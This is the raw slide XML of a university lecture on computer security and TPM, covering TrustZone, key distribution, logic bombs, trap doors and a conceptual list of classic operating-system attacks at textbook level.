            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> CPU that is used to run trusted applications isolated from normal applications, and to access the memory space reserved for trusted applications,</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74</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sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>TrustZone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> Generic API </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>provides a simple message-passing interface for low-level communication across the security boundary.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>TrustZone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> Security Channel API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>a more tightly-defined interface API designed to allow access to  commonly-available security functionality that resides behind the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>TrustZone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> security barrier.</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75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spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can we perform key distribution without an authentication server?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Yes.  Use a Public-Key Cryptosystem.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Public Key Details</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{04982B31-5F2E-4241-814E-088E6ECAA300}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>12</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CN" dirty="0" smtClean="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Company programmer writes program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>potential to do harm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>OK as long as he/she enters password daily</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>ff programmer fired, no password and bomb explodes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" smtClean="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Provides a certain set of inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Programmer’s name appears on payroll (really!)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" smtClean="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" smtClean="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{04982B31-5F2E-4241-814E-088E6ECAA300}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>18</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64931" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Trap door: user’s access privileges coded into program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{04982B31-5F2E-4241-814E-088E6ECAA300}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>19</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defTabSz="864931" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most common in user-level programs that help the OS do something</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{04982B31-5F2E-4241-814E-088E6ECAA300}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>21</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defTabSz="864931" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>Allows execution of code with same privileges as running program – but happens without any action from user!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{04982B31-5F2E-4241-814E-088E6ECAA300}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>24</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altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Typical attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Request memory, disk space, tapes and just read</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Try illegal system calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Start a login and hit DEL, RUBOUT, or BREAK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Try modifying complex OS structures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Try to do specified DO NOTs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Convince a system programmer to add a trap door</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Beg </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>admin's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>secretary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t> to help a poor user who forgot password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{04982B31-5F2E-4241-814E-088E6ECAA300}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>26</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4982B31-5F2E-4241-814E-088E6ECAA300}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>27</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2522AE9-B1C6-B042-A107-EE906DAFE47A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/19/2012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D4F11291-2B30-3D42-A075-BF4A8873D0D5}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/19/2012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1961FA4-0376-9A4A-8001-3635594315D3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/19/2012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5727700" cy="474663"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1143000"/>
            <a:ext cx="3848100" cy="21383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quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4686300" y="1143000"/>
            <a:ext cx="3848100" cy="992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Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4686300" y="2287588"/>
            <a:ext cx="3848100" cy="99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80010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66738" y="3962400"/>
            <a:ext cx="80010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08BF767-F4A4-4E9D-8CF4-A625768251E5}"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A293F12C-4659-41B6-B93C-24B878A29BAE}"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39282" y="103718"/>
            <a:ext cx="8648344" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="230736" y="1350236"/>
            <a:ext cx="8665436" cy="515311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a:xfrm>
            <a:off x="457200" y="6544362"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{43978029-9DF7-7445-88EF-08A8BCC03D5B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/19/2012</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6544362"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Spring 2011 -- Lecture #11</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="6544362"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3CC63E4C-4642-794D-A2FD-70F6B81535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BF1B337-2382-054B-9CBC-B5E6411EBFC8}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/19/2012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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{20CED5B6-3291-6D46-85CD-2C693E79C6ED}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/19/2012</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Spring 2011 -- Lecture #11</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29890781-A657-344A-B5F5-E7E27B755F8D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/19/2012</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Spring 2011 -- Lecture #11</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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E25C27C2-B258-D042-8C37-02CB7DB48EA7}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/19/2012</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Spring 2011 -- Lecture #11</a:t>
            </a:r>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1E2F40-4452-5E42-ADDE-AC114AFD9781}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/19/2012</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Spring 2011 -- Lecture #11</a:t>
            </a:r>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6D50A32-0882-CC44-8C88-9E3A1DD8E6FF}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/19/2012</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Spring 2011 -- Lecture #11</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438934B-CF74-4240-9435-A7755750A14A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/19/2012</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Spring 2011 -- Lecture #11</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371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6373" y="1307508"/>
            <a:ext cx="8673981" cy="498219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F726D6-095E-2A47-BF9C-15C211CC03CA}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/19/2012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Spring 2011 -- Lecture #11</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18.jpeg"/></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Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> TPM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Instructor:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Zonghua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Gu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F4BA2A7E-5181-A840-825F-018EFA86BC7E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Spring 2011 -- Lecture #11</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Date Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A3E8E8DC-A926-074D-8C54-DA0784BE7FC6}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/19/2012</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8338" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Key Distribution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1038339" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="212725" y="1691148"/>
            <a:ext cx="8718550" cy="4862052"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How do you get shared secret to both places?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For instance: how do you send authenticated, secret mail to someone who you have never met?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
